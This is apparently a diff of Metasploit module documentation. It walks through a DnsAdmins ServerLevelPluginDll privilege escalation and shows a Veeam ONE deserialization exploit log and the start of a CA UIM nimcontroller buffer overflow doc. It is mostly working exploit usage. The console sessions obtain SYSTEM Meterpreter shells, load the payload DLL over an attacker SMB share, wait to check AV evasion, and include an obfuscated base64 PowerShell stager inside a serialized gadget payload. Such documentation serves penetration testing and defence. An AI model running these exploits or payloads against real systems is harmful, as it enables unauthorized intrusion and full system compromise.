+user that you just created. It should look something in the format of *domain name*\*user name*.
+Then click Apply and click OK.
+8. Run gpupdate again.
+9. Reboot
+10. You should now be able to log in as the new user, which should also be in the DnsAdmins group.
+You can confirm this by running `net localgroup DnsAdmins` and confirming that the new user is
+listed as a member of this group in the output returned.
+11. Run `wmic useraccount where name='*username of the new account*'` to get the SID of the
+new account that you added in earlier.
+12. Run `sc sdset "DNS" D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CR;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;PU)(A;;RPWPDTLO;;;S-x-x-xx-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxxx-xxxx)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)`
+in an elevated command prompt replacing the sample SID with the SID obtained via the earlier command
+(aka the SID of the new low privileged user you added).
+
+## Verification Steps
+
+1. Get a Meterpreter shell
+2. `use exploit/windows/local/dnsadmin_serverlevelplugindll`
+3. `set PAYLOAD <payload>`. Payload architecture must be the same as the target system
+4. `set LHOST <lhost>`
+5. `set LPORT <lport>`
+6. `set SESSION <session_no>` to specify session
+7. `set DLLNAME <dllname>` if you want to name your DLL something other than `msf.dll`
+8. `set DLLPATH <dllpath>` if you want to place your DLL somewhere other than `%TEMP%` or if you want to use a UNC path
+9. `set MAKEDLL true` if you want to just make the DLL, and not carry out the exploit
+10. `exploit` to get SYSTEM shell if `MAKEDLL` is set to `false`, or to write
+the DLL to the `~/.msf4/local` folder if `MAKEDLL` is set to `true`
+
+## Options
+
+### DLLNAME
+Name of the DLL to use.
+
+### DLLPATH
+Location of the DLL to use. If a UNC path is provided, the module will assume that the operator
+has already performed the following actions:
+1. Set up a working SMB2 share (via a tool such as Impacket's `smbserver.py` via a command such as
+`sudo python3 smbserver.py -smb2support -ip 172.17.168.195 test /home/gwillcox/.msf4/local/`
+2. Created a DLL of the same architecture as the target system and placed in within this share.
+
+### MAKEDLL
+If set to `true`, then just create the DLL, do not conduct the full exploit.
+The resulting DLL will be stored in the `~/.msf4/local` directory.
+
+### AVTIMEOUT
+Time, in seconds, to wait for any AV on the target system to potentially pick up on the
+dropped DLL file, prior to the module checking to see if the DLL file still exists. This
+is needed to prevent a scenario where the DLL file gets removed and the module tries to make
+changes that could prevent the DNS server from being able to start.
+
+## Scenarios
+
+### Windows Server 2019 Standard x64, writing `msf.dll` to `%TEMP%`
+```
+msf6 exploit(multi/handler) > use exploit/windows/local/dnsadmin_serverlevelplugindll 
+s[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > show options
+
+Module options (exploit/windows/local/dnsadmin_serverlevelplugindll):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   AVTIMEOUT  60               yes       Time to wait for AV to potentially notice the DLL file we dropped, in seconds.
+   DLLNAME    msf.dll          yes       DLL name (default: msf.dll)
+   DLLPATH    %TEMP%           yes       Path to DLL. Can be a UNC path. (default: %TEMP%)
+   MAKEDLL    false            yes       Just create the DLL, do not exploit.
+   SESSION                     yes       The session to run this module on.
+
+
+Payload options (windows/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     172.17.168.195   yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/bind_tcp
+PAYLOAD => windows/x64/meterpreter/bind_tcp
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set RHOST 172.17.169.123
+RHOST => 172.17.169.123
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1 
+SESSION => 1
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 7788
+LPORT => 7788
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
+
+[*] Checking service state...
+[*] Building DLL...
+[+] Wrote DLL to C:\Users\normal\AppData\Local\Temp\1\msf.dll!
+[*] Sleeping for 60 seconds to ensure the file wasn't caught by any AV...
+[+] Looks like our file wasn't caught by the AV.
+[!] Entering danger section...
+[*] Modifying ServerLevelPluginDll to point to C:\Users\normal\AppData\Local\Temp\1\msf.dll...
+[+] Registry property serverlevelplugindll successfully reset.
+[*] Restarting the DNS service...
+[*] Started bind TCP handler against 172.17.169.123:7788
+[*] Sending stage (200262 bytes) to 172.17.169.123
+[*] Meterpreter session 2 opened (0.0.0.0:0 -> 172.17.169.123:7788) at 2020-09-09 14:48:59 -0500
+
+meterpreter > 
+[+] Exited danger zone successfully!
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > background
+[*] Backgrounding session 2...
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                            Connection
+  --  ----  ----                     -----------                            ----------
+  1         meterpreter x64/windows  RAPID7\normal @ WIN-M5JU6L5RA9L        0.0.0.0:0 -> 172.17.169.123:4444 (172.17.169.123)
+  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ WIN-M5JU6L5RA9L  0.0.0.0:0 -> 172.17.169.123:7788 (172.17.169.123)
+
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > sysinfo
+Computer        : WIN-M5JU6L5RA9L
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : RAPID7
+Logged On Users : 12
+Meterpreter     : x64/windows
+meterpreter > 
+```
+
+### Windows Server 2019 Standard x64, specifying a UNC path for ServerLevelPluginDll
+The easiest way to set this up is to Impacket's `smbserver`. You can find the source code for Impacket at https://github.com/SecureAuthCorp/impacket.
+Download the latest release and untar it, then `cd` into the new directory that is created. You should see a file named `setup.py`. Run the command
+`sudo python3 setup.py install` and it will install Impacket for you. Once this is done, navigate to the `examples` directory and follow the following steps:
+
+```
+ ~/Desktop/impacket-0.9.21/examples  sudo python3 smbserver.py -smb2support -ip 172.17.168.195 test /home/gwillcox/.msf4/local/
+Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
+
+[*] Config file parsed
+[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
+[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
+[*] Config file parsed
+[*] Config file parsed
+[*] Config file parsed
+
+```
+
+This will create a SMBv2 server, listening on IP address 172.17.168.195, with a share named `test`, that will be sharing the contents of
+the directory at `/home/gwillcox/.msf4/local/`. Next, set `MAKEDLL` to `true` and run the module to generate the payload.
+
+```
+msf6 exploit(multi/handler) > use exploit/windows/local/dnsadmin_serverlevelplugindll 
+[*] Using configured payload windows/x64/meterpreter/bind_tcp
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 3 
+SESSION => 3
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/bind_tcp
+PAYLOAD => windows/x64/meterpreter/bind_tcp
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 6688
+LPORT => 6688
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME mp4.dll
+DLLNAME => mp4.dll
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set MAKEDLL true
+MAKEDLL => true
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > show options
+
+Module options (exploit/windows/local/dnsadmin_serverlevelplugindll):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   AVTIMEOUT  60               yes       Time to wait for AV to potentially notice the DLL file we dropped, in seconds.
+   DLLNAME    mp4.dll          yes       DLL name (default: msf.dll)
+   DLLPATH    %TEMP%           yes       Path to DLL. Can be a UNC path. (default: %TEMP%)
+   MAKEDLL    true             yes       Just create the DLL, do not exploit.
+   SESSION    3                yes       The session to run this module on.
+
+
+Payload options (windows/x64/meterpreter/bind_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LPORT     6688             yes       The listen port
+   RHOST     172.17.169.123   no        The target address
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
+
+[*] Building DLL...
+[+] mp4.dll stored at /home/gwillcox/.msf4/local/mp4.dll
+[*] Started bind TCP handler against 172.17.169.123:6688
+[*] Exploit completed, but no session was created.
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > 
+```
+
+Once the DLL has been generated, one can proceed with the actual exploit:
+```
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set MAKEDLL false
+MAKEDLL => false
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLPATH \\\\172.17.168.195\\test
+DLLPATH => \\172.17.168.195\test
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME mp4.dll
+DLLNAME => mp4.dll
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
+
+[*] Checking service state...
+[*] Using user-provided UNC path.
+[!] Entering danger section...
+[*] Modifying ServerLevelPluginDll to point to \\172.17.168.195\test\mp4.dll...
+[+] Registry property serverlevelplugindll successfully reset.
+[*] Restarting the DNS service...
+[*] Started bind TCP handler against 172.17.169.123:6688
+[*] Sending stage (200262 bytes) to 172.17.169.123
+[*] Meterpreter session 4 opened (0.0.0.0:0 -> 172.17.169.123:6688) at 2020-09-09 15:06:33 -0500
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : WIN-M5JU6L5RA9L
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : RAPID7
+Logged On Users : 12
+Meterpreter     : x64/windows
+meterpreter > 
+```
+
+### Windows Server 2019 Standard x64, just creating DLL
+```
+msf6 exploit(multi/handler) > use exploit/windows/local/dnsadmin_serverlevelplugindll 
+[*] Using configured payload windows/x64/meterpreter/bind_tcp
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 3 
+SESSION => 3
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/bind_tcp
+PAYLOAD => windows/x64/meterpreter/bind_tcp
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 6688
+LPORT => 6688
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME mp4.dll
+DLLNAME => mp4.dll
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set MAKEDLL true
+MAKEDLL => true
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > show options
+
+Module options (exploit/windows/local/dnsadmin_serverlevelplugindll):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   AVTIMEOUT  60               yes       Time to wait for AV to potentially notice the DLL file we dropped, in seconds.
+   DLLNAME    mp4.dll          yes       DLL name (default: msf.dll)
+   DLLPATH    %TEMP%           yes       Path to DLL. Can be a UNC path. (default: %TEMP%)
+   MAKEDLL    true             yes       Just create the DLL, do not exploit.
+   SESSION    3                yes       The session to run this module on.
+
+
+Payload options (windows/x64/meterpreter/bind_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LPORT     6688             yes       The listen port
+   RHOST     172.17.169.123   no        The target address
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
+
+[*] Building DLL...
+[+] mp4.dll stored at /home/gwillcox/.msf4/local/mp4.dll
+[*] Started bind TCP handler against 172.17.169.123:6688
+[*] Exploit completed, but no session was created.
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) >
+```
+
+## Notes
+1. This module is not particularly opsec-safe as it drops a DLL to disk, writes to
+the registry, and is sure to generate a ton of event logs when the DNS service is
+stopped and restarted..
+2. Automatic cleanup of the dropped DLL is attempted if the DLL has been written to
+disk, but if automatic cleanup fails manual cleanup may be necessary.
@@ -101,7 +101,7 @@ msf5 exploit(windows/misc/veeam_one_agent_deserialization) > run
 [+] 172.16.249.150:2805 - <-- Host info reply: "\x03\x02\x00"
 [*] 172.16.249.150:2805 - Executing PowerShell Stager for windows/x64/meterpreter/reverse_tcp
 [*] 172.16.249.150:2805 - Powershell command length: 2506
-[*] 172.16.249.150:2805 - Serializing command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPbHp14CA7VWa2+bSBT9nEj5D6iyZFAcG7tOmo1UacGGGNekpgTbsWutMIxh6mEgMMQm3f73vWNDmm7T3XalRUjM4z7PPTOXdU49hmMqkAvh88nx0dhN3UgQa+jCbAi1RNcd6egI1mu73QpdCm8FcaEkST+OXEyXV1e9PE0RZYd58xoxJctQtCIYZaIk/ClMQ5Sis/erT8hjwmeh9kfzmsQrl5RiRc/1QiScKdTne6PYc3kwTTshmIn1jx/r0uKsvWxq97lLMrFuFxlDUdMnpC4JXyTu8LZIkFg3sZfGWbxmzSmmrztNh2buGt2AtQdkIhbGflaXIA14U8TylAqHhLiFw75Yh+E4jT3F91OUZfWGsOC2F8vl7+KidPwhpwxHqGlQhtI4sVH6gD2UNQcu9Qn6gNZL0LJZimmwlCQQe4g3SKzRnJCG8CtmxBu0rWD7WSXxuRJIjVkqNaCULyVqxn5O0EG1/kKkvP4SPBUHALsvJ8cnx+uKLnl4/5wvMDpa7McIohPHcYb3Ym8FuSGY4MZlcVrAtHab5khaPmEr1ArLafxYvV3JguSK0PEA1haTGPtL0CkrWgu9aYev/5iZfbTGFPUL6kbYq8gnvoQyWhO0T7FZid1AVGK93EB+HxEUuIzDxov9nZoWYfakq+aY+ChVPKhUBlFBEaVvgzlUQqwb1EQRYHSYA/tqa6A8qqRLmheVdz4HoXqPuFnWEMY5nDmvIdjIJchvCArNcLml5CzeD+tfwzVzwrDnZqwyt5QqHEt/vZhmLM09KBvkfmsnyMMu4VA0hAH2kVrYOKj81l8EoucSAgcBLD1AIWCFA2AzToYUQuSFl5o2YkaUEBSByP7s68QN4KSXbN+Txw2QX/97gBWZD8zlUFQYPAsP6muTmDWECU4ZXCEc1j2L/pP7Z5fHPpBeispKiNX5WKgF47Su7db3JOCcLHHZo5AyQEBP40h1M3TRPVwU4quWhvvn4378qMCj6R+siWo7k7lh+kNiG8y+0/DICUMDt40A5oWjBWMmJ+9ubwdDuz9Q0v4uXCtGZmgDtbDaquIN8JvJUHUc0MO9kfVpZyi+GgWz4K63NcbhzABHvVFgBPBVjdBT5bkcqLLeG9lqqGFZCWxrYHXbc6N1SVT8aBu2Mpg++Xvyo3W7g9nuVrkxh0qov/f1dkff62+4/nxzPepr+7nH59ZdpmEN/Gj6nTUJ0XSSqFNNn1uTxAhOt4E1GbW6eqjCuoF3o8RuwdNuDx+o/2iSy0cTwrUm8yFGcyNARaBYimLfUWKvtj1F1b1U7Z8rju7A2ubWoDtrlZh+cTdo/TYxMUpixdIURSdwJiPF3fZb7Wn8zpqcW44m7wpH3m21T62thofbTfl1ri8ugta6O25NbIMO3FCFeIthd4OHp7AXuRP5bt2acPz6Gm090hlxx712TFattoP7b1TVwGh4Y3rkXoWcwca5tYp7HS9cQ0xGcGkFs5h23A3YnQYKRAf5QZ3XQwN01JzgjXM647aGWzka7mQeZzS8hNg6ZQwKo8asBfEpg77do9e2Mev4SFdbp97bV5y0wNpaFD642TMy/qiVmG6ahS4BkkKLqK4GPU718tYfx5hriCL8LGxQShGBVgvNuDpeCiGxx3sO7w7Q7g5NiPdEB4avOy+OJOFJUPraiaqlq6s5hAjHdX+gmiNEAxY25N1rWYbOIu+6MiT583n14qQQD7YavDUdoHkyT/bmJX6Sa/f3xv8JWXl5hPDx/wWyr2v/sPtTMMqNMuHv1r9d+CVMfzHxqYsZyNlw9RF0aL4v5l+y49nPCVQEKr8uH/57+T5nZzfwy3Jy/BfBhjzkyAoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
+[*] 172.16.249.150:2805 - Executing command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPbHp14CA7VWa2+bSBT9nEj5D6iyZFAcG7tOmo1UacGGGNekpgTbsWutMIxh6mEgMMQm3f73vWNDmm7T3XalRUjM4z7PPTOXdU49hmMqkAvh88nx0dhN3UgQa+jCbAi1RNcd6egI1mu73QpdCm8FcaEkST+OXEyXV1e9PE0RZYd58xoxJctQtCIYZaIk/ClMQ5Sis/erT8hjwmeh9kfzmsQrl5RiRc/1QiScKdTne6PYc3kwTTshmIn1jx/r0uKsvWxq97lLMrFuFxlDUdMnpC4JXyTu8LZIkFg3sZfGWbxmzSmmrztNh2buGt2AtQdkIhbGflaXIA14U8TylAqHhLiFw75Yh+E4jT3F91OUZfWGsOC2F8vl7+KidPwhpwxHqGlQhtI4sVH6gD2UNQcu9Qn6gNZL0LJZimmwlCQQe4g3SKzRnJCG8CtmxBu0rWD7WSXxuRJIjVkqNaCULyVqxn5O0EG1/kKkvP4SPBUHALsvJ8cnx+uKLnl4/5wvMDpa7McIohPHcYb3Ym8FuSGY4MZlcVrAtHab5khaPmEr1ArLafxYvV3JguSK0PEA1haTGPtL0CkrWgu9aYev/5iZfbTGFPUL6kbYq8gnvoQyWhO0T7FZid1AVGK93EB+HxEUuIzDxov9nZoWYfakq+aY+ChVPKhUBlFBEaVvgzlUQqwb1EQRYHSYA/tqa6A8qqRLmheVdz4HoXqPuFnWEMY5nDmvIdjIJchvCArNcLml5CzeD+tfwzVzwrDnZqwyt5QqHEt/vZhmLM09KBvkfmsnyMMu4VA0hAH2kVrYOKj81l8EoucSAgcBLD1AIWCFA2AzToYUQuSFl5o2YkaUEBSByP7s68QN4KSXbN+Txw2QX/97gBWZD8zlUFQYPAsP6muTmDWECU4ZXCEc1j2L/pP7Z5fHPpBeispKiNX5WKgF47Su7db3JOCcLHHZo5AyQEBP40h1M3TRPVwU4quWhvvn4378qMCj6R+siWo7k7lh+kNiG8y+0/DICUMDt40A5oWjBWMmJ+9ubwdDuz9Q0v4uXCtGZmgDtbDaquIN8JvJUHUc0MO9kfVpZyi+GgWz4K63NcbhzABHvVFgBPBVjdBT5bkcqLLeG9lqqGFZCWxrYHXbc6N1SVT8aBu2Mpg++Xvyo3W7g9nuVrkxh0qov/f1dkff62+4/nxzPepr+7nH59ZdpmEN/Gj6nTUJ0XSSqFNNn1uTxAhOt4E1GbW6eqjCuoF3o8RuwdNuDx+o/2iSy0cTwrUm8yFGcyNARaBYimLfUWKvtj1F1b1U7Z8rju7A2ubWoDtrlZh+cTdo/TYxMUpixdIURSdwJiPF3fZb7Wn8zpqcW44m7wpH3m21T62thofbTfl1ri8ugta6O25NbIMO3FCFeIthd4OHp7AXuRP5bt2acPz6Gm090hlxx712TFattoP7b1TVwGh4Y3rkXoWcwca5tYp7HS9cQ0xGcGkFs5h23A3YnQYKRAf5QZ3XQwN01JzgjXM647aGWzka7mQeZzS8hNg6ZQwKo8asBfEpg77do9e2Mev4SFdbp97bV5y0wNpaFD642TMy/qiVmG6ahS4BkkKLqK4GPU718tYfx5hriCL8LGxQShGBVgvNuDpeCiGxx3sO7w7Q7g5NiPdEB4avOy+OJOFJUPraiaqlq6s5hAjHdX+gmiNEAxY25N1rWYbOIu+6MiT583n14qQQD7YavDUdoHkyT/bmJX6Sa/f3xv8JWXl5hPDx/wWyr2v/sPtTMMqNMuHv1r9d+CVMfzHxqYsZyNlw9RF0aL4v5l+y49nPCVQEKr8uH/57+T5nZzfwy3Jy/BfBhjzkyAoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
 [*] 172.16.249.150:2805 - Sending malicious handshake to 172.16.249.150:2805
 [+] 172.16.249.150:2805 - --> Handshake packet: "\x9E\f\x00\x00\a\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x01\x00\x00\x00\xFF\xFF\xFF\xFF\x01\x00\x00\x00\x00\x00\x00\x00\f\x02\x00\x00\x00^Microsoft.PowerShell.Editor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35\x05\x01\x00\x00\x00BMicrosoft.VisualStudio.Text.Formatting.TextFormattingRunProperties\x01\x00\x00\x00\x0FForegroundBrush\x01\x02\x00\x00\x00\x06\x03\x00\x00\x00\xBC\x17<ResourceDictionary xmlns=\"http://schemas.microsoft.com/winfx/2006/xaml/presentation\" xmlns:X=\"http://schemas.microsoft.com/winfx/2006/xaml\" xmlns:S=\"clr-namespace:System;assembly=mscorlib\" xmlns:D=\"clr-namespace:System.Diagnostics;assembly=system\"><ObjectDataProvider X:Key=\"\" ObjectType=\"{X:Type D:Process}\" MethodName=\"Start\"><ObjectDataProvider.MethodParameters><S:String>cmd</S:String><S:String>/c powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b=$env:windir+'\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPbHp14CA7VWa2+bSBT9nEj5D6iyZFAcG7tOmo1UacGGGNekpgTbsWutMIxh6mEgMMQm3f73vWNDmm7T3XalRUjM4z7PPTOXdU49hmMqkAvh88nx0dhN3UgQa+jCbAi1RNcd6egI1mu73QpdCm8FcaEkST+OXEyXV1e9PE0RZYd58xoxJctQtCIYZaIk/ClMQ5Sis/erT8hjwmeh9kfzmsQrl5RiRc/1QiScKdTne6PYc3kwTTshmIn1jx/r0uKsvWxq97lLMrFuFxlDUdMnpC4JXyTu8LZIkFg3sZfGWbxmzSmmrztNh2buGt2AtQdkIhbGflaXIA14U8TylAqHhLiFw75Yh+E4jT3F91OUZfWGsOC2F8vl7+KidPwhpwxHqGlQhtI4sVH6gD2UNQcu9Qn6gNZL0LJZimmwlCQQe4g3SKzRnJCG8CtmxBu0rWD7WSXxuRJIjVkqNaCULyVqxn5O0EG1/kKkvP4SPBUHALsvJ8cnx+uKLnl4/5wvMDpa7McIohPHcYb3Ym8FuSGY4MZlcVrAtHab5khaPmEr1ArLafxYvV3JguSK0PEA1haTGPtL0CkrWgu9aYev/5iZfbTGFPUL6kbYq8gnvoQyWhO0T7FZid1AVGK93EB+HxEUuIzDxov9nZoWYfakq+aY+ChVPKhUBlFBEaVvgzlUQqwb1EQRYHSYA/tqa6A8qqRLmheVdz4HoXqPuFnWEMY5nDmvIdjIJchvCArNcLml5CzeD+tfwzVzwrDnZqwyt5QqHEt/vZhmLM09KBvkfmsnyMMu4VA0hAH2kVrYOKj81l8EoucSAgcBLD1AIWCFA2AzToYUQuSFl5o2YkaUEBSByP7s68QN4KSXbN+Txw2QX/97gBWZD8zlUFQYPAsP6muTmDWECU4ZXCEc1j2L/pP7Z5fHPpBeispKiNX5WKgF47Su7db3JOCcLHHZo5AyQEBP40h1M3TRPVwU4quWhvvn4378qMCj6R+siWo7k7lh+kNiG8y+0/DICUMDt40A5oWjBWMmJ+9ubwdDuz9Q0v4uXCtGZmgDtbDaquIN8JvJUHUc0MO9kfVpZyi+GgWz4K63NcbhzABHvVFgBPBVjdBT5bkcqLLeG9lqqGFZCWxrYHXbc6N1SVT8aBu2Mpg++Xvyo3W7g9nuVrkxh0qov/f1dkff62+4/nxzPepr+7nH59ZdpmEN/Gj6nTUJ0XSSqFNNn1uTxAhOt4E1GbW6eqjCuoF3o8RuwdNuDx+o/2iSy0cTwrUm8yFGcyNARaBYimLfUWKvtj1F1b1U7Z8rju7A2ubWoDtrlZh+cTdo/TYxMUpixdIURSdwJiPF3fZb7Wn8zpqcW44m7wpH3m21T62thofbTfl1ri8ugta6O25NbIMO3FCFeIthd4OHp7AXuRP5bt2acPz6Gm090hlxx712TFattoP7b1TVwGh4Y3rkXoWcwca5tYp7HS9cQ0xGcGkFs5h23A3YnQYKRAf5QZ3XQwN01JzgjXM647aGWzka7mQeZzS8hNg6ZQwKo8asBfEpg77do9e2Mev4SFdbp97bV5y0wNpaFD642TMy/qiVmG6ahS4BkkKLqK4GPU718tYfx5hriCL8LGxQShGBVgvNuDpeCiGxx3sO7w7Q7g5NiPdEB4avOy+OJOFJUPraiaqlq6s5hAjHdX+gmiNEAxY25N1rWYbOIu+6MiT583n14qQQD7YavDUdoHkyT/bmJX6Sa/f3xv8JWXl5hPDx/wWyr2v/sPtTMMqNMuHv1r9d+CVMfzHxqYsZyNlw9RF0aL4v5l+y49nPCVQEKr8uH/57+T5nZzfwy3Jy/BfBhjzkyAoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"</S:String></ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>\v"
 [+] 172.16.249.150:2805 - <-- Handshake reply: "\x00\x00\x00\x00\xBA\xB0\x8DJ\xA2A\eL\x9E\xD3r\xB4w\xD3\xEFn\x0E\x00\x00\x00\a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00"
@@ -0,0 +1,113 @@
+## Vulnerable Application
+
+All CA Infrastructure Management monitoring agents prior to 9.20 are vulnerable to a buffer overflow vulnerability
+within the nimcontroller when using the directory_list probe. Since the directory_list probe requires read privileges
+the target host must also be vulnerable to CVE-2020-8010 to bypass ACL settings. Successful code execution will result
+in a NT AUTHORITY\SYSTEM shell, even if exploitation fails the remote service will not crash. You should be able to
+exploit the service an unlimited amount of times.
+
+## Verification Steps
+
+1. Install the CA UIM v7.80.3132 (nimsoftrobotXXX.exe)
+2. Start `msfconsole`
+3. Do `use exploit/windows/nimsoft/nimcontroller_bof`
+4. Do `set RHOSTS <ip>`
+5. Do `exploit`
+6. Verify shell is opened and service is still accessible
+
+### Links
+
+[CA UIM](https://techdocs.broadcom.com/content/broadcom/techdocs/us/en/ca-enterprise-software/it-operations-management/unified-infrastructure-management/9-0-2/getting-started/ca-uim-overview.html)
+[Nimsoft Probe Utility](https://techdocs.broadcom.com/content/broadcom/techdocs/us/en/ca-enterprise-software/it-operations-management/unified-infrastructure-management/9-0-2/administering/run-probe-commands-from-a-command-prompt.html)
+
+## Options
+
+## Scenarios
+
+### Windows 10 x64
+
+```
+msf5 exploit(windows/nimsoft/nimcontroller_bof) > options
+
+Module options (exploit/windows/nimsoft/nimcontroller_bof):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   DIRECTORY  C:\              no        Directory path to obtain a listing
+   RHOSTS     W.X.Y.Z          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      48000            yes       The target port (TCP)
+
+
+Payload options (windows/x64/meterpreter/reverse_https):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     A.B.C.D          yes       The local listener hostname
+   LPORT     8443             yes       The local listener port
+   LURI                       no        The HTTP Path
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows Universal (x64) - v7.80.3132
+
+
+msf5 exploit(windows/nimsoft/nimcontroller_bof) > exploit
+
+[*] Started HTTPS reverse handler on https://A.B.C.D:8443
+[*] W.X.Y.Z:48000 - Executing automatic check (disable AutoCheck to override)
+[*] https://A.B.C.D:8443 handling request from W.X.Y.Z; (UUID: rpsri4cm) Attaching orphaned/stageless session...
